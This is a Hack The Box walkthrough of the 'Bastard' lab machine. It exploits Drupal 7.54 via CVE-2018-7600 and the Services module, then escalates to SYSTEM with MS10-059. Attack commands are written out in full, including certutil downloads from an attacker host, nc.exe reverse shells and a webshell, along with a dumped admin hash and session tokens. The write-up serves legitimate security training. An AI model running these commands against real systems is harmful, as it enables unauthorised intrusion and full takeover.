HTB - Bastard

Getting Root:

Enumerating port 80 shows the box is running Drupal 7.54 which is vulnerable to remote code execution
After getting a low privilege shell, we escalate privilege to SYSTEM using MS10-059

Tools Used:

nmap, curl, windows-exploit-suggester.py, certutil

Nmap

nmap -sC -sV -p 80,135,49154 -oA Bastard.nmap 10.10.10.9
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-10 14:56 EDT
Nmap scan report for 10.10.10.9
Host is up (0.038s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.21 seconds

Enumerating Port 80

Checking robots.txt

curl -s http://10.10.10.9/robots.txt
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used:    http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/robotstxt.html

User-agent: *
Crawl-delay: 10
# CSS, JS, Images
Allow: /misc/*.css$
Allow: /misc/*.css?
Allow: /misc/*.js$
Allow: /misc/*.js?
Allow: /misc/*.gif
Allow: /misc/*.jpg
Allow: /misc/*.jpeg
Allow: /misc/*.png
Allow: /modules/*.css$
Allow: /modules/*.css?
Allow: /modules/*.js$
Allow: /modules/*.js?
Allow: /modules/*.gif
Allow: /modules/*.jpg
Allow: /modules/*.jpeg
Allow: /modules/*.png
Allow: /profiles/*.css$
Allow: /profiles/*.css?
Allow: /profiles/*.js$
Allow: /profiles/*.js?
Allow: /profiles/*.gif
Allow: /profiles/*.jpg
Allow: /profiles/*.jpeg
Allow: /profiles/*.png
Allow: /themes/*.css$
Allow: /themes/*.css?
Allow: /themes/*.js$
Allow: /themes/*.js?
Allow: /themes/*.gif
Allow: /themes/*.jpg
Allow: /themes/*.jpeg
Allow: /themes/*.png
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/

Checking CHANGELOG.TXT reveals the version of Drupal to be 7.54

curl -s http://10.10.10.9/CHANGELOG.TXT | head -n 20

Drupal 7.54, 2017-02-01
-----------------------
- Modules are now able to define theme engines (API addition:
  https://www.drupal.org/node/2826480).
- Logging of searches can now be disabled (new option in the administrative
  interface).
- Added menu tree render structure to (pre-)process hooks for theme_menu_tree()
  (API addition: https://www.drupal.org/node/2827134).
- Added new function for determining whether an HTTPS request is being served
  (API addition: https://www.drupal.org/node/2824590).
- Fixed incorrect default value for short and medium date formats on the date
  type configuration page.
- File validation error message is now removed after subsequent upload of valid
  file.
- Numerous bug fixes.
- Numerous API documentation improvements.
- Additional performance improvements.
- Additional automated test coverage.

Exploit

Found the following exploit for Drupal 7.54 on GitHub.

GitHub - pimps/CVE-2018-7600: Exploit for Drupal 7 <= 7.57 CVE-2018-7600GitHub

# On my kali box
python3 drupa7-CVE-2018-7600.py http://10.10.10.9/ -c "ping 10.10.14.3"

=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-i725q67HTHWEJND2D2j81b32GnpnfR0-FrPu9EtnaHs
[*] Triggering exploit to execute: ping 10.10.14.3

Pinging 10.10.14.3 with 32 bytes of data:
Reply from 10.10.14.3: bytes=32 time=38ms TTL=63
Reply from 10.10.14.3: bytes=32 time=38ms TTL=63
Reply from 10.10.14.3: bytes=32 time=38ms TTL=63
Reply from 10.10.14.3: bytes=32 time=38ms TTL=63

Ping statistics for 10.10.14.3:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 38ms, Maximum = 38ms, Average = 38ms



# tcpdump -nni tun0 icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
16:06:52.106926 IP 10.10.10.9 > 10.10.14.3: ICMP echo request, id 1, seq 5, length 40
16:06:52.106955 IP 10.10.14.3 > 10.10.10.9: ICMP echo reply, id 1, seq 5, length 40
16:06:53.100795 IP 10.10.10.9 > 10.10.14.3: ICMP echo request, id 1, seq 6, length 40
16:06:53.100823 IP 10.10.14.3 > 10.10.10.9: ICMP echo reply, id 1, seq 6, length 40
16:06:54.099473 IP 10.10.10.9 > 10.10.14.3: ICMP echo request, id 1, seq 7, length 40
16:06:54.099566 IP 10.10.14.3 > 10.10.10.9: ICMP echo reply, id 1, seq 7, length 40
16:06:55.097763 IP 10.10.10.9 > 10.10.14.3: ICMP echo request, id 1, seq 8, length 40
16:06:55.097801 IP 10.10.14.3 > 10.10.10.9: ICMP echo reply, id 1, seq 8, length 40

That confirms we have remote command execution

Getting a shell

 python3 drupa7-CVE-2018-7600.py http://10.10.10.9/ -c "certutil -urlcache -f -split http://10.10.14.3/nc.exe"

=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-YTR40kc-mSMxpyUSUJ2dLSE4dJNb9wwxn-iADCFwEK0
[*] Triggering exploit to execute: certutil -urlcache -f -split http://10.10.14.3/nc.exe
****  Online  ****
  0000  ...
  e800
CertUtil: -URLCache command completed successfully.


# I see the box downloaded the executable
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.9 - - [10/Mar/2020 16:12:38] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.9 - - [10/Mar/2020 16:12:38] "GET /nc.exe HTTP/1.1" 200 -



# triggered the revserve shell
python3 drupa7-CVE-2018-7600.py http://10.10.10.9/ -c "nc.exe 10.10.14.3 9001 -e cmd.exe"

=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-vKZAyRgmhvQT0vwjVnFd7o8_kDB1RJozNGyygzMCcGY
[*] Triggering exploit to execute: nc.exe 10.10.14.3 9001 -e cmd.exe




# Got a shell!!!
rlwrap nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.9] 59893
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\inetpub\drupal-7.54>

Privilege Escalation

Windows Exploit Suggester

[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*] 
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*] 
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical

Got SYSTEM using MS10-059

Downloaded the exploit to the target

certutil -urlcache -f -split http://10.10.14.3/MS10-059.exe
****  Online  ****
  000000  ...
  0bf800
CertUtil: -URLCache command completed successfully.

C:\inetpub\drupal-7.54>MS10-059.exe 10.10.14.3 9002
MS10-059.exe 10.10.14.3 9002
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR>

Got a shell with SYSTEM privileges

python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.9 - - [10/Mar/2020 16:19:34] "GET /MS10-059.exe HTTP/1.1" 200 -
10.10.10.9 - - [10/Mar/2020 16:19:35] "GET /MS10-059.exe HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.
root@kdeali:~/HackTheBox/Bastard/smb# rlwrap nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.9] 59897
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\inetpub\drupal-7.54>whoami
whoami
nt authority\system

System Information

Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00496-001-0001283-84782
Original Install Date:     18/3/2017, 7:04:46 
System Boot Time:          10/3/2020, 8:39:41 
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2.047 MB
Available Physical Memory: 1.562 MB
Virtual Memory: Max Size:  4.095 MB
Virtual Memory: Available: 3.590 MB
Virtual Memory: In Use:    505 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.9

Another Way To Do the Box:

# searchsploit drupal 7
Exploit Title:
Drupal 7.x Module Services - Remote Code Execution

Exploit Path:
exploits/php/webapps/41564.php

I tried running this exploit but keep getting errors at execution. For this exploit to work, you might need to install php-curl

apt install php-curl

From gobuster I was able to see /rest in the output. So I used curl to check it out.

curl -s http://10.10.10.9/rest
Services Endpoint "rest_endpoint" has been setup successfully.

With that information, I modified the php exploit as follows: ( I also had to modified a few syntax errors which basically needed to be commented out)

$url = 'http://10.10.10.9';
#$endpoint_path = '/rest_endpoint';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';

Running the exploit

php 41564.php 
# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage: https://www.drupal.org/project/services
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics 
# Website: https://www.ambionics.io/blog/drupal-services-module-rce


#!/usr/bin/php
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written: http://10.10.10.9/dixuSOspsOUU.php

Got two files

1. session.json 2. user.json

cat user.json 
{
    "uid": "1",
    "name": "admin",
    "mail": "drupal@hackthebox.gr",
    "theme": "",
    "created": "1489920428",
    "access": "1583872959",
    "login": 1583873660,
    "status": "1",
    "timezone": "Europe\/Athens",
    "language": "",
    "picture": null,
    "init": "drupal@hackthebox.gr",
    "data": false,
    "roles": {
        "2": "authenticated user",
        "3": "administrator"
    },
    "rdf_mapping": {
        "rdftype": [
            "sioc:UserAccount"
        ],
        "name": {
            "predicates": [
                "foaf:name"
            ]
        },
        "homepage": {
            "predicates": [
                "foaf:page"
            ],
            "type": "rel"
        }
    },
    "pass": "$S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE"

cat session.json 
{
    "session_name": "SESSd873f26fc11f2b7e6e4aa0f6fce59913",
    "session_id": "Dj8-dy-6rEzLuEOdOvMXqf8FQJNsk2P1ZVzhbH5K-bc",
    "token": "XvZ60x9iDr2E4nsl4DzbpW_2tKEkbMTE45CFH7J2PEY"
}

I used the Firefox plugin Cookie Quick Manager and added the cookie from the session.json file

Refresh the page http://10.10.10.9

After hitting refresh on the site, you should be logged in as Admin

Go to Modules and and enable PHP Filter

Scroll all the way to the bottom and click Save Configuration

Getting a reverse shell

Click on "Add Content"

Add "Basic Page"

Add your php code

Add a title, your PHP code and change the Text format to PHP code. Then scroll all the way to the bottom and click Save.

In my case, the PHP code I used is a webshell I got from GitHub. This webshell allows me to execute any commands on the target and even upload files such as the compiled binary for MS10-059 we used on method 1 and get a shell as SYSTEM.

Getting the reverse shell

Got a shell as SYSTEM

rlwrap nc -lnvp 9009
listening on [any] 9009 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.9] 60226
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\inetpub\drupal-7.54>whoami
whoami
nt authority\system

C:\inetpub\drupal-7.54>

PreviousHTB - Silo NextHTB - Legacy

Last updated 5 years ago